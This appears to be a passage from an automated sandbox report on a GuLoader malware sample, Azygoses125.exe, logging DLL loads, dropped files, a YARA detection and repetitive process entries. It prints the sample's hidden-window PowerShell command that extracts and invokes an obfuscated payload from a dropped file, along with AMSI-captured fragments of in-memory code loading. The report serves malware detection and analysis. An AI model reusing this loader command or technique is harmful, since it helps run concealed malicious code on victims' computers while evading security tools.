Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Azygoses125.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Azygoses125.exe

File written: C:\Windows\Resources\unthick.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Azygoses125.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000005.00000002.1528725368.0000000008043000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000005.00000002.1530729050.0000000008D47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Vitreum $Legemsbygninger $Underdrawn), (Tempelordenens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Biproduktet = [AppDomain]::CurrentDomain.GetAssembli
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Opbrudte208)), $Glarmestresdemands).DefineDynamicModule($Tyndedes, $false).DefineType($Uskara73, $stubmlle, [System.MulticastDelegate]

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Azygoses125.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Okkupationers=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som';$Indyndendes=$Okkupationers.SubString(74357,3);.$Indyndendes($Okkupationers) "
Source: C:\Users\user\Desktop\Azygoses125.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Okkupationers=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som';$Indyndendes=$Okkupationers.SubString(74357,3);.$Indyndendes($Okkupationers) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_043DA5CF push eax; iretd	5_2_043DA659
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_043DE9F9 push eax; mov dword ptr [esp], edx	5_2_043DEA0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08C70E9B push esp; ret	5_2_08C70E9C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08C70E54 push esp; ret	5_2_08C70E55
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08C70F14 push esp; ret	5_2_08C70F15
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_3_208FBAE4 push ebx; retf	9_3_208FBAE5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_3_208F913D push es; retf	9_3_208F9150
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 9_3_208FDF48 push FFFFFFAEh; retf	9_3_208FDF4A

Source: C:\Users\user\Desktop\Azygoses125.exe	File created: C:\Users\user\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\magmaet\clenched\Azygoses125.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Azygoses125.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Azygoses125.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
